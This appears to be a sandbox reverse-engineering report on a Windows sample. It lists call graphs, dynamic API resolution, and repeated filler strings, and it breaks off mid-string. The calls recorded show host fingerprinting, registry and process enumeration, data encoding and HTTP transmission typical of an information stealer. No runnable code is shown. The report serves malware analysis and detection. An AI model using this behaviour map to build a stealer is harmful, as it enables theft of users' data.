249c10 / 24a036 / 249c20: clusters of GetProcAddress calls (24a0cc, 24a21f, 24a428: 5 each; 24a4ab, 24a4e5: 2 each; 24a61b, 24a6a7: 4 each; 24a686: 1) interleaved with blocks of 6, 8, 9, 10 and 43 API calls, ending at 245ca3 and 231590.
231590 / 231670 / 245510: string helpers at 24a740, 24a7a0, 24a8a0 (lstrcpy) and 24a820 (lstrlen, lstrcpy); StrCmpCA at 245643, 2456a0, 24578a, 245856, 24593f, 245a0b; Sleep at 245a16; 2452c0 (25 API calls) and 2451f0 (20 API calls).
247553: GetVolumeInformationA; 2475fc: GetProcessHeap, RtlAllocateHeap; 247628: wsprintfA.
2347b0 / 234899: InternetOpenA and StrCmpCA at 23490b; 248b60 (3 API calls); 239ac0: CryptStringToBinaryA; 24a920 (3 API calls) and 24a9b0 (4 API calls) repeated; InternetConnectA at 234aa3; HttpOpenRequestA at 234ad3; lstrlen at 234de7 and 234e03; 24aad0; HttpSendRequestA at 234e13; InternetReadFile at 234e32; InternetCloseHandle at 234e67, 234ebe, 234ecb.
235979: same pattern as above: InternetOpenA and StrCmpCA at 2359ee; InternetConnectA at 235b7c; HttpOpenRequestA at 235bac; lstrlen, GetProcessHeap, RtlAllocateHeap at 235e81; HttpSendRequestA at 235f2a; InternetReadFile at 235f35; InternetCloseHandle at 235f6a, 235fb6, 235fc3.
2417c4: StrCmpCA, then ExitProcess at 2417cf or a series of StrCmpCA checks (24185d, 24187f, 2418ad, 2418cf, 2418f1, 241913, 241932, 241951, 241970) ending at 2419c2.
240db7, 240f67, 241077: loops over 24a820 (lstrlen, lstrcpy) with StrCmpCA at 240e27, 240e67, 240ea4, 240fb2.
241a26 onward: repeated 24a9b0 / 24a8a0 calls interleaved with 247500 (6 API calls), 247690 (GetProcessHeap, RtlAllocateHeap), 2477c0 (GetCurrentProcess, IsWow64Process), 247850 (3 API calls), 2478e0 (3 API calls), 247980 (GetProcessHeap, RtlAllocateHeap, GetLocalTime, wsprintfA), 247a30 (GetProcessHeap, RtlAllocateHeap, GetTimeZoneInformation), 247b00 (GetUserDefaultLocaleName), 247b90, 247d80 (GetSystemPowerStatus), GetCurrentProcessId at 24207e, 249470 (OpenProcess), 247e00 (GetProcessHeap, RtlAllocateHeap, RegOpenKeyExA), 247f60, 247ed0 (GetSystemInfo, wsprintfA), 248100 (GetProcessHeap, RtlAllocateHeap), 2487c0, 2481f0, 248320.
15307->15308 15309 24254c 15308->15309 15310 248320 17 API calls 15309->15310 15311 242568 15310->15311 15312 24a920 3 API calls 15311->15312 15313 24257b 15312->15313 15314 24a8a0 lstrcpy 15313->15314 15315 242584 15314->15315 15316 24a9b0 4 API calls 15315->15316 15317 2425ae 15316->15317 15318 24a8a0 lstrcpy 15317->15318 15319 2425b7 15318->15319 15320 24a9b0 4 API calls 15319->15320 15321 2425d6 15320->15321 15322 24a8a0 lstrcpy 15321->15322 15323 2425df 15322->15323 15324 24a9b0 4 API calls 15323->15324 15325 242600 15324->15325 15326 24a8a0 lstrcpy 15325->15326 15327 242609 15326->15327 15873 248680 15327->15873 15329 242620 15330 24a920 3 API calls 15329->15330 15331 242633 15330->15331 15332 24a8a0 lstrcpy 15331->15332 15333 24263c 15332->15333 15334 24265a lstrlen 15333->15334 15335 24266a 15334->15335 15336 24a740 lstrcpy 15335->15336 15337 24267c 15336->15337 15338 231590 lstrcpy 15337->15338 15339 24268d 15338->15339 15883 245190 15339->15883 15341 242699 15341->13773 16071 24aad0 15342->16071 15344 235009 InternetOpenUrlA 15347 235021 15344->15347 15345 2350a0 InternetCloseHandle InternetCloseHandle 15348 2350ec 15345->15348 15346 23502a InternetReadFile 15346->15347 15347->15345 15347->15346 15348->13777 16072 2398d0 15349->16072 15351 240759 15352 24077d 15351->15352 15353 240a38 15351->15353 15355 240799 StrCmpCA 15352->15355 15354 231590 lstrcpy 15353->15354 15356 240a49 15354->15356 15357 2407a8 15355->15357 15385 240843 15355->15385 16248 240250 15356->16248 15359 24a7a0 lstrcpy 15357->15359 15360 2407c3 15359->15360 15362 231590 lstrcpy 15360->15362 15361 240865 StrCmpCA 15364 240874 15361->15364 15401 24096b 15361->15401 15366 24080c 15362->15366 15365 24a740 lstrcpy 15364->15365 15367 240881 15365->15367 15368 24a7a0 lstrcpy 15366->15368 15372 24a9b0 4 API calls 15367->15372 15373 240823 15368->15373 15369 24099c StrCmpCA 15370 240a2d 15369->15370 15371 2409ab 15369->15371 15370->13781 15374 231590 lstrcpy 15371->15374 15375 2408ac 
15372->15375 15376 24a7a0 lstrcpy 15373->15376 15377 2409f4 15374->15377 15378 24a920 3 API calls 15375->15378 15379 24083e 15376->15379 15380 24a7a0 lstrcpy 15377->15380 15381 2408b3 15378->15381 16075 23fb00 15379->16075 15383 240a0d 15380->15383 15384 24a9b0 4 API calls 15381->15384 15386 24a7a0 lstrcpy 15383->15386 15387 2408ba 15384->15387 15385->15361 15388 240a28 15386->15388 15401->15369 15723 24a7a0 lstrcpy 15722->15723 15724 231683 15723->15724 15725 24a7a0 lstrcpy 15724->15725 15726 231695 15725->15726 15727 24a7a0 lstrcpy 15726->15727 15728 2316a7 15727->15728 15729 24a7a0 lstrcpy 15728->15729 15730 2315a3 15729->15730 15730->14604 15732 2347c6 15731->15732 15733 234838 lstrlen 15732->15733 15757 24aad0 15733->15757 15735 234848 InternetCrackUrlA 15736 234867 15735->15736 15736->14681 15738 24a740 lstrcpy 15737->15738 15739 248b74 15738->15739 15740 24a740 lstrcpy 15739->15740 15741 248b82 GetSystemTime 15740->15741 15743 248b99 15741->15743 15742 24a7a0 lstrcpy 15744 248bfc 15742->15744 15743->15742 15744->14696 15746 24a931 15745->15746 15747 24a988 15746->15747 15749 24a968 lstrcpy lstrcat 15746->15749 15748 24a7a0 lstrcpy 15747->15748 15750 24a994 15748->15750 15749->15747 15750->14699 15751->14814 15753 234eee 15752->15753 15754 239af9 LocalAlloc 15752->15754 15753->14702 15753->14704 15754->15753 15755 239b14 CryptStringToBinaryA 15754->15755 15755->15753 15756 239b39 LocalFree 15755->15756 15756->15753 15757->15735 15758->14824 15759->14965 15760->14967 15761->14975 15890 2477a0 15762->15890 15765 2476c6 RegOpenKeyExA 15767 247704 RegCloseKey 15765->15767 15768 2476e7 RegQueryValueExA 15765->15768 15766 241c1e 15766->15057 15767->15766 15768->15767 15770 241c99 15769->15770 15770->15071 15772 241e09 15771->15772 15772->15113 15774 241e84 15773->15774 15775 247a9a wsprintfA 15773->15775 15774->15127 15775->15774 15777 247b4d 15776->15777 15779 241efe 15776->15779 15897 248d20 LocalAlloc CharToOemW 15777->15897 15779->15141 15781 24a740 lstrcpy 
15780->15781 15782 247bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15781->15782 15790 247c25 15782->15790 15783 247c46 GetLocaleInfoA 15783->15790 15784 247d18 15785 247d1e LocalFree 15784->15785 15786 247d28 15784->15786 15785->15786 15787 24a7a0 lstrcpy 15786->15787 15789 247d37 15787->15789 15788 24a9b0 lstrcpy lstrlen lstrcpy lstrcat 15788->15790 15789->15154 15790->15783 15790->15784 15790->15788 15791 24a8a0 lstrcpy 15790->15791 15791->15790 15793 242008 15792->15793 15793->15169 15795 2494b5 15794->15795 15796 249493 GetModuleFileNameExA CloseHandle 15794->15796 15797 24a740 lstrcpy 15795->15797 15796->15795 15798 242091 15797->15798 15798->15184 15800 247e68 RegQueryValueExA 15799->15800 15802 242119 15799->15802 15801 247e8e RegCloseKey 15800->15801 15801->15802 15802->15198 15804 247fb9 GetLogicalProcessorInformationEx 15803->15804 15805 247fd8 GetLastError 15804->15805 15806 248029 15804->15806 15813 247fe3 15805->15813 15815 248022 15805->15815 15809 2489f0 2 API calls 15806->15809 15812 24807b 15809->15812 15810 2489f0 2 API calls 15811 242194 15810->15811 15811->15212 15814 248084 wsprintfA 15812->15814 15812->15815 15813->15804 15813->15811 15898 2489f0 15813->15898 15901 248a10 GetProcessHeap RtlAllocateHeap 15813->15901 15814->15811 15815->15810 15815->15811 15817 24220f 15816->15817 15817->15226 15819 2489b0 15818->15819 15820 24814d GlobalMemoryStatusEx 15819->15820 15823 248163 15820->15823 15821 24819b wsprintfA 15822 242289 15821->15822 15822->15240 15823->15821 15825 2487fb GetProcessHeap RtlAllocateHeap wsprintfA 15824->15825 15827 24a740 lstrcpy 15825->15827 15828 24230b 15827->15828 15828->15254 15830 24a740 lstrcpy 15829->15830 15834 248229 15830->15834 15831 248263 15833 24a7a0 lstrcpy 15831->15833 15832 24a9b0 lstrcpy lstrlen lstrcpy lstrcat 15832->15834 15835 2482dc 15833->15835 15834->15831 15834->15832 15836 24a8a0 lstrcpy 15834->15836 15835->15271 15836->15834 15838 24a740 lstrcpy 15837->15838 15839 24835c 
RegOpenKeyExA 15838->15839 15840 2483d0 15839->15840 15841 2483ae 15839->15841 15843 248613 RegCloseKey 15840->15843 15844 2483f8 RegEnumKeyExA 15840->15844 15842 24a7a0 lstrcpy 15841->15842 15854 2483bd 15842->15854 15847 24a7a0 lstrcpy 15843->15847 15845 24860e 15844->15845 15846 24843f wsprintfA RegOpenKeyExA 15844->15846 15845->15843 15848 248485 RegCloseKey RegCloseKey 15846->15848 15849 2484c1 RegQueryValueExA 15846->15849 15847->15854 15850 24a7a0 lstrcpy 15848->15850 15851 248601 RegCloseKey 15849->15851 15852 2484fa lstrlen 15849->15852 15850->15854 15851->15845 15852->15851 15853 248510 15852->15853 15855 24a9b0 4 API calls 15853->15855 15854->15297 15856 248527 15855->15856 15857 24a8a0 lstrcpy 15856->15857 15858 248533 15857->15858 15859 24a9b0 4 API calls 15858->15859 15860 248557 15859->15860 15861 24a8a0 lstrcpy 15860->15861 15862 248563 15861->15862 15863 24856e RegQueryValueExA 15862->15863 15863->15851 15864 2485a3 15863->15864 15865 24a9b0 4 API calls 15864->15865 15866 2485ba 15865->15866 15867 24a8a0 lstrcpy 15866->15867 15868 2485c6 15867->15868 15869 24a9b0 4 API calls 15868->15869 15870 2485ea 15869->15870 15871 24a8a0 lstrcpy 15870->15871 15872 2485f6 15871->15872 15872->15851 15874 24a740 lstrcpy 15873->15874 15875 2486bc CreateToolhelp32Snapshot Process32First 15874->15875 15876 24875d CloseHandle 15875->15876 15877 2486e8 Process32Next 15875->15877 15878 24a7a0 lstrcpy 15876->15878 15877->15876 15882 2486fd 15877->15882 15880 248776 15878->15880 15879 24a8a0 lstrcpy 15879->15882 15880->15329 15881 24a9b0 lstrcpy lstrlen lstrcpy lstrcat 15881->15882 15882->15877 15882->15879 15882->15881 15884 24a7a0 lstrcpy 15883->15884 15885 2451b5 15884->15885 15886 231590 lstrcpy 15885->15886 15887 2451c6 15886->15887 15902 235100 15887->15902 15889 2451cf 15889->15341 15893 247720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15890->15893 15892 2476b9 15892->15765 15892->15766 15894 247765 RegQueryValueExA 15893->15894 15895 247780 RegCloseKey 
15893->15895 15894->15895 15896 247793 15895->15896 15896->15892 15897->15779 15899 248a0c 15898->15899 15900 2489f9 GetProcessHeap HeapFree 15898->15900 15899->15813 15900->15899 15901->15813 15903 24a7a0 lstrcpy 15902->15903 15904 235119 15903->15904 15905 2347b0 2 API calls 15904->15905 15906 235125 15905->15906 16062 248ea0 15906->16062 15908 235184 15909 235192 lstrlen 15908->15909 15910 2351a5 15909->15910 15911 248ea0 4 API calls 15910->15911 15912 2351b6 15911->15912 15913 24a740 lstrcpy 15912->15913 15914 2351c9 15913->15914 15915 24a740 lstrcpy 15914->15915 15916 2351d6 15915->15916 15917 24a740 lstrcpy 15916->15917 15918 2351e3 15917->15918 15919 24a740 lstrcpy 15918->15919 15920 2351f0 15919->15920 15921 24a740 lstrcpy 15920->15921 15922 2351fd InternetOpenA StrCmpCA 15921->15922 15923 23522f 15922->15923 15924 2358c4 InternetCloseHandle 15923->15924 15925 248b60 3 API calls 15923->15925 15931 2358d9 codecvt 15924->15931 15926 23524e 15925->15926 15927 24a920 3 API calls 15926->15927 15928 235261 15927->15928 15929 24a8a0 lstrcpy 15928->15929 15930 23526a 15929->15930 15932 24a9b0 4 API calls 15930->15932 15935 24a7a0 lstrcpy 15931->15935 15933 2352ab 15932->15933 15934 24a920 3 API calls 15933->15934 15936 2352b2 15934->15936 15943 235913 15935->15943 15937 24a9b0 4 API calls 15936->15937 15938 2352b9 15937->15938 15939 24a8a0 lstrcpy 15938->15939 15940 2352c2 15939->15940 15941 24a9b0 4 API calls 15940->15941 15942 235303 15941->15942 15944 24a920 3 API calls 15942->15944 15943->15889 15945 23530a 15944->15945 15946 24a8a0 lstrcpy 15945->15946 15947 235313 15946->15947 15948 235329 InternetConnectA 15947->15948 15948->15924 15949 235359 HttpOpenRequestA 15948->15949 15951 2358b7 InternetCloseHandle 15949->15951 15952 2353b7 15949->15952 15951->15924 15953 24a9b0 4 API calls 15952->15953 15954 2353cb 15953->15954 15955 24a8a0 lstrcpy 15954->15955 15956 2353d4 15955->15956 15957 24a920 3 API calls 15956->15957 15958 2353f2 15957->15958 15959 24a8a0 
lstrcpy 15958->15959 15960 2353fb 15959->15960 15961 24a9b0 4 API calls 15960->15961 15962 23541a 15961->15962 15963 24a8a0 lstrcpy 15962->15963 15964 235423 15963->15964 15965 24a9b0 4 API calls 15964->15965 15966 235444 15965->15966 15967 24a8a0 lstrcpy 15966->15967 15968 23544d 15967->15968 15969 24a9b0 4 API calls 15968->15969 15970 23546e 15969->15970 15971 24a8a0 lstrcpy 15970->15971 16063 248ead CryptBinaryToStringA 16062->16063 16066 248ea9 16062->16066 16064 248ece GetProcessHeap RtlAllocateHeap 16063->16064 16063->16066 16065 248ef4 codecvt 16064->16065 16064->16066 16067 248f05 CryptBinaryToStringA 16065->16067 16066->15908 16067->16066 16071->15344 16314 239880 16072->16314 16074 2398e1 16074->15351 16076 24a740 lstrcpy 16075->16076 16249 24a740 lstrcpy 16248->16249 16250 240266 16249->16250 16251 248de0 2 API calls 16250->16251 16252 24027b 16251->16252 16253 24a920 3 API calls 16252->16253 16254 24028b 16253->16254 16255 24a8a0 lstrcpy 16254->16255 16256 240294 16255->16256 16257 24a9b0 4 API calls 16256->16257 16258 2402b8 16257->16258 16315 23988e 16314->16315 16318 236fb0 16315->16318 16317 2398ad codecvt 16317->16074 16321 236d40 16318->16321 16322 236d63 16321->16322 16335 236d59 16321->16335 16337 236530 16322->16337 16326 236dbe 16326->16335 16347 2369b0 16326->16347 16328 236e2a 16329 236ee6 VirtualFree 16328->16329 16331 236ef7 16328->16331 16328->16335 16329->16331 16330 236f41 16332 2489f0 2 API calls 16330->16332 16330->16335 16331->16330 16333 236f26 FreeLibrary 16331->16333 16334 236f38 16331->16334 16332->16335 16333->16331 16336 2489f0 2 API calls 16334->16336 16335->16317 16336->16330 16338 236542 16337->16338 16340 236549 16338->16340 16357 248a10 GetProcessHeap RtlAllocateHeap 16338->16357 16340->16335 16341 236660 16340->16341 16346 23668f VirtualAlloc 16341->16346 16343 236730 16344 236743 VirtualAlloc 16343->16344 16345 23673c 16343->16345 16344->16345 16345->16326 16346->16343 16346->16345 16348 2369c9 16347->16348 16351 2369d5 
16347->16351 16349 236a09 LoadLibraryA 16348->16349 16348->16351 16350 236a32 16349->16350 16349->16351 16354 236ae0 16350->16354 16358 248a10 GetProcessHeap RtlAllocateHeap 16350->16358 16351->16328 16353 236ba8 GetProcAddress 16353->16351 16353->16354 16354->16351 16354->16353 16355 2489f0 2 API calls 16355->16354 16356 236a8b 16356->16351 16356->16355 16357->16340 16358->16356

                                  Control-flow Graph

                                  control_flow_graph 660 249860-249874 call 249750 663 249a93-249af2 LoadLibraryA * 5 660->663 664 24987a-249a8e call 249780 GetProcAddress * 21 660->664 666 249af4-249b08 GetProcAddress 663->666 667 249b0d-249b14 663->667 664->663 666->667 668 249b46-249b4d 667->668 669 249b16-249b41 GetProcAddress * 2 667->669 671 249b4f-249b63 GetProcAddress 668->671 672 249b68-249b6f 668->672 669->668 671->672 673 249b71-249b84 GetProcAddress 672->673 674 249b89-249b90 672->674 673->674 675 249bc1-249bc2 674->675 676 249b92-249bbc GetProcAddress * 2 674->676 676->675
                                  APIs
                                  • GetProcAddress.KERNEL32(76210000,010416E0), ref: 002498A1
                                  • GetProcAddress.KERNEL32(76210000,010416F8), ref: 002498BA
                                  • GetProcAddress.KERNEL32(76210000,01041500), ref: 002498D2
                                  • GetProcAddress.KERNEL32(76210000,01041710), ref: 002498EA
                                  • GetProcAddress.KERNEL32(76210000,01041728), ref: 00249903
                                  • GetProcAddress.KERNEL32(76210000,010488F8), ref: 0024991B
                                  • GetProcAddress.KERNEL32(76210000,01035048), ref: 00249933
                                  • GetProcAddress.KERNEL32(76210000,01034FA8), ref: 0024994C
                                  • GetProcAddress.KERNEL32(76210000,010415F0), ref: 00249964
                                  • GetProcAddress.KERNEL32(76210000,01041608), ref: 0024997C
                                  • GetProcAddress.KERNEL32(76210000,010417A0), ref: 00249995
                                  • GetProcAddress.KERNEL32(76210000,01041518), ref: 002499AD
                                  • GetProcAddress.KERNEL32(76210000,010351E8), ref: 002499C5
                                  • GetProcAddress.KERNEL32(76210000,01041620), ref: 002499DE
                                  • GetProcAddress.KERNEL32(76210000,010417B8), ref: 002499F6
                                  • GetProcAddress.KERNEL32(76210000,01035168), ref: 00249A0E
                                  • GetProcAddress.KERNEL32(76210000,01041590), ref: 00249A27
                                  • GetProcAddress.KERNEL32(76210000,010415C0), ref: 00249A3F
                                  • GetProcAddress.KERNEL32(76210000,01035008), ref: 00249A57
                                  • GetProcAddress.KERNEL32(76210000,01041638), ref: 00249A70
                                  • GetProcAddress.KERNEL32(76210000,010352A8), ref: 00249A88
                                  • LoadLibraryA.KERNEL32(010414E8,?,00246A00), ref: 00249A9A
                                  • LoadLibraryA.KERNEL32(01041560,?,00246A00), ref: 00249AAB
                                  • LoadLibraryA.KERNEL32(01041680,?,00246A00), ref: 00249ABD
                                  • LoadLibraryA.KERNEL32(01041650,?,00246A00), ref: 00249ACF
                                  • LoadLibraryA.KERNEL32(01041770,?,00246A00), ref: 00249AE0
                                  • GetProcAddress.KERNEL32(75B30000,01041668), ref: 00249B02
                                  • GetProcAddress.KERNEL32(751E0000,01041530), ref: 00249B23
                                  • GetProcAddress.KERNEL32(751E0000,01041548), ref: 00249B3B
                                  • GetProcAddress.KERNEL32(76910000,01048D28), ref: 00249B5D
                                  • GetProcAddress.KERNEL32(75670000,01034FE8), ref: 00249B7E
                                  • GetProcAddress.KERNEL32(77310000,01048998), ref: 00249B9F
                                  • GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 00249BB6
                                  Strings
                                  • NtQueryInformationProcess, xrefs: 00249BAA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: NtQueryInformationProcess
                                  • API String ID: 2238633743-2781105232
                                  • Opcode ID: 491d5b5a06cc96da00ca8dbb87c644cc3361b58992db2291f65a1461832f4599
                                  • Instruction ID: 5ebe954b90037456eeccbc5b8ec6a0deb5fddaed78e7d0377853b84f2033d9b8
                                  • Opcode Fuzzy Hash: 491d5b5a06cc96da00ca8dbb87c644cc3361b58992db2291f65a1461832f4599
                                  • Instruction Fuzzy Hash: ADA159B5504200AFD348EFB8ED8996E77F9F7CC301705453AA61D83264D63998E6CB1B

                                  Control-flow Graph

                                  control_flow_graph 764 2345c0-234695 RtlAllocateHeap 781 2346a0-2346a6 764->781 782 23474f-2347a9 VirtualProtect 781->782 783 2346ac-23474a 781->783 783->781
                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0023460F
                                  • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0023479C
                                  Strings
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00234638
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00234729
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002345DD
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00234734
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00234622
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0023471E
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002345C7
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0023466D
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00234617
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00234713
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0023462D
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0023474F
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00234643
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002346AC
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002345E8
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00234662
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002346C2
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00234770
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0023477B
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002346B7
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00234683
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0023473F
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00234657
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002346CD
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002345F3
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0023475A
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00234765
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00234678
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002346D8
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002345D2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeapProtectVirtual
                                  • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the 